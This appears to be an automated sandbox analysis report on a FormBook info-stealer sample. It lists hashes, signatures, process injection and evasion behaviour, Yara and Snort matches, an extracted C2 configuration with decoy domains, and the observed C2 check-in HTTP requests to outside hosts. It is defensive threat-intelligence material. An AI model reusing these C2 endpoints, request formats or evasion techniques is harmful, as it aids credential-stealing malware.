
Windows Analysis Report
skyrunyyu655432.exe

Overview

General Information

Sample Name: skyrunyyu655432.exe
Analysis ID: 635291
MD5: 070a940ccbc84f85a8ba749eccf55618
SHA1: b6624708fa177d6a591c01ba291d40390bb6d8e7
SHA256: a734d235386d77a1c6a88bdf63efce5134a82a90e113be647200401b717b891e
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • skyrunyyu655432.exe (PID: 6220 cmdline: "C:\Users\user\Desktop\skyrunyyu655432.exe" MD5: 070A940CCBC84F85A8BA749ECCF55618)
    • jfotlqeoqb.exe (PID: 6364 cmdline: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss MD5: E85BB68B7CBEFADF0D1ACD4B7B8BD528)
      • jfotlqeoqb.exe (PID: 6404 cmdline: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss MD5: E85BB68B7CBEFADF0D1ACD4B7B8BD528)
        • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • ipconfig.exe (PID: 4108 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
            • cmd.exe (PID: 4468 cmdline: /c del "C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 3376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
Source | Rule | Description | Author | Strings
00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
Source | Rule | Description | Author | Strings
3.0.jfotlqeoqb.exe.400000.9.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.0.jfotlqeoqb.exe.400000.9.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
3.0.jfotlqeoqb.exe.400000.9.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
3.0.jfotlqeoqb.exe.400000.9.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.0.jfotlqeoqb.exe.400000.9.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          No Sigma rule has matched
Timestamp: 05/27/22-18:36:55.446707
Source IP: 192.168.2.3
Destination IP: 66.235.200.147
SID: 2031412
Source Port: 49755
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/27/22-18:36:55.446707
Source IP: 192.168.2.3
Destination IP: 66.235.200.147
SID: 2031453
Source Port: 49755
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/27/22-18:36:55.446707
Source IP: 192.168.2.3
Destination IP: 66.235.200.147
SID: 2031449
Source Port: 49755
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected


          AV Detection

          Source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.boxberry-my.com/sn31/"], "decoy": ["matsuomatsuo.com", "104wn.com", "bolacorner.com", "dawonderer.com", "yourpamlano.xyz", "mtzmx.icu", "lepakzaparket.com", "barmagli.com", "danta.ltd", "marumaru240.com", "people-centeredhr.com", "test-brew-inc.com", "clairvoyantbusinesscoach.com", "aforeignexchangeblog.com", "erentekbilisim.com", "gangqinqu123.net", "defiguaranteebonds.com", "thegioigaubong97.site", "vaoiwin.info", "vcwholeness.com", "03c3twpfee5estjovfu2655.com", "mutantapeyachtclubtoken.store", "pixelkev.xyz", "corporacioncymaz.com", "iampro-found.com", "azureconsults.com", "bam-bong.com", "advanceresubeopene.biz", "tzjisheng.com", "krdz28.online", "ycw2009.com", "minioe.com", "dronelink.xyz", "autu.cfd", "sdwmkj.com", "uixray.xyz", "informacion-numero-24-h.site", "123dianyingyuan.com", "tj-assets.com", "usaservicedogregistratuon.com", "metagwnics.com", "pepeksquad2.host", "kc7.club", "yundtremark.com", "finance-employers.com", "euroglobalnews.info", "estudioenzetti.com", "rodosmail.xyz", "bm65.xyz", "bchmtn.net", "server4uuss.net", "maisonretraiteprivee.com", "atelierelzaaidar.com", "thegurlyboutique.com", "primobellaquartz.com", "jetskirentaldublin.com", "akmeetech.com", "withoutyoutube.com", "blackcreekwatershed.com", "89qp52.com", "e3488.com", "vote4menk.com", "tyma.club", "theceditpalooza.com"]}
Source: skyrunyyu655432.exe | Virustotal: Detection: 42%
Source: skyrunyyu655432.exe | ReversingLabs: Detection: 34%
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.jfotlqeoqb.exe.1660000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.jfotlqeoqb.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.jfotlqeoqb.exe.1660000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.jfotlqeoqb.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: www.boxberry-my.com/sn31/ | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | ReversingLabs: Detection: 36%
Source: 2.2.jfotlqeoqb.exe.1660000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.jfotlqeoqb.exe.400000.7.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.jfotlqeoqb.exe.400000.9.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.jfotlqeoqb.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.jfotlqeoqb.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: skyrunyyu655432.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: ipconfig.pdb source: jfotlqeoqb.exe, 00000003.00000002.373051178.00000000019D0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: jfotlqeoqb.exe, 00000003.00000002.373051178.00000000019D0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: C:\drzmu\ggsdfz\yvaw\e1787da5c4714b909513c5a841b06b91\ftesxt\xwtvbdyl\Release\xwtvbdyl.pdb source: skyrunyyu655432.exe, 00000000.00000002.321823751.000000000040B000.00000004.00000001.01000000.00000003.sdmp, skyrunyyu655432.exe, 00000000.00000002.322060613.000000000275C000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000002.00000002.292672930.00000000001FB000.00000002.00000001.01000000.00000004.sdmp, jfotlqeoqb.exe, 00000002.00000000.279753075.00000000001FB000.00000002.00000001.01000000.00000004.sdmp, jfotlqeoqb.exe, 00000003.00000000.287892253.00000000001FB000.00000002.00000001.01000000.00000004.sdmp, ipconfig.exe, 0000000D.00000002.547054865.00000000030DF000.00000004.10000000.00040000.00000000.sdmp, nspF162.tmp.0.dr, jfotlqeoqb.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: jfotlqeoqb.exe, 00000002.00000003.291035467.000000001E160000.00000004.00001000.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000002.00000003.290469489.000000001DFD0000.00000004.00001000.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000003.293986604.0000000001865000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000003.292333571.00000000016D0000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000002.373260356.0000000001B1F000.00000040.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000002.373075677.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000002.546062335.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000002.546473284.0000000002CCF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000003.372760279.0000000002877000.00000004.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000003.375023667.0000000002A13000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: jfotlqeoqb.exe, 00000002.00000003.291035467.000000001E160000.00000004.00001000.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000002.00000003.290469489.000000001DFD0000.00000004.00001000.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000003.293986604.0000000001865000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000003.292333571.00000000016D0000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000002.373260356.0000000001B1F000.00000040.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000002.373075677.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 0000000D.00000002.546062335.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000002.546473284.0000000002CCF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000003.372760279.0000000002877000.00000004.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000003.375023667.0000000002A13000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\skyrunyyu655432.exe | Code function: 0_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\skyrunyyu655432.exe | Code function: 0_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\skyrunyyu655432.exe | Code function: 0_2_004026A1 FindFirstFileA,
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi

          Networking

Source: C:\Windows\explorer.exe | Domain query: www.dawonderer.com
Source: C:\Windows\explorer.exe | Network Connect: 66.235.200.147 80
Source: C:\Windows\explorer.exe | Domain query: www.bolacorner.com
Source: C:\Windows\explorer.exe | Network Connect: 52.71.57.184 80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49755 -> 66.235.200.147:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49755 -> 66.235.200.147:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49755 -> 66.235.200.147:80
Source: Malware configuration extractor | URLs: www.boxberry-my.com/sn31/
Source: global traffic | HTTP traffic detected: GET /sn31/?m6R01xM0=qZl/JLX84vnD5ytzVzk0/a0Hcpketn5qZPO1CaBkWF6tW2qs6ow5h/A/zRQwl5G72f7o&nPqD=gvLpMpxpWl HTTP/1.1 | Host: www.dawonderer.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sn31/?m6R01xM0=f82GdrL9BOGPadRnOYEWsPSt+bOR3tUYa+dCVqOhmg/09rEzcw7t3bM5PuUufbFtM3zx&nPqD=gvLpMpxpWl HTTP/1.1 | Host: www.bolacorner.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 52.71.57.184
Source: ipconfig.exe, 0000000D.00000002.547196966.00000000035CF000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=bolacorner.com
Source: unknown | DNS traffic detected: queries for: www.dawonderer.com
Source: jfotlqeoqb.exe, 00000002.00000002.293051588.000000000170A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\skyrunyyu655432.exe | Code function: 0_2_00404FDD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.jfotlqeoqb.exe.1660000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.jfotlqeoqb.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.jfotlqeoqb.exe.1660000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.jfotlqeoqb.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.jfotlqeoqb.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.0.jfotlqeoqb.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.jfotlqeoqb.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.jfotlqeoqb.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.jfotlqeoqb.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.jfotlqeoqb.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.jfotlqeoqb.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.jfotlqeoqb.exe.1660000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.jfotlqeoqb.exe.1660000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.jfotlqeoqb.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.jfotlqeoqb.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.jfotlqeoqb.exe.1660000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.jfotlqeoqb.exe.1660000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.jfotlqeoqb.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.jfotlqeoqb.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.jfotlqeoqb.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.jfotlqeoqb.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.jfotlqeoqb.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.jfotlqeoqb.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: skyrunyyu655432.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 3.0.jfotlqeoqb.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.jfotlqeoqb.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.jfotlqeoqb.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.jfotlqeoqb.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.jfotlqeoqb.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.jfotlqeoqb.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.jfotlqeoqb.exe.1660000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.jfotlqeoqb.exe.1660000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
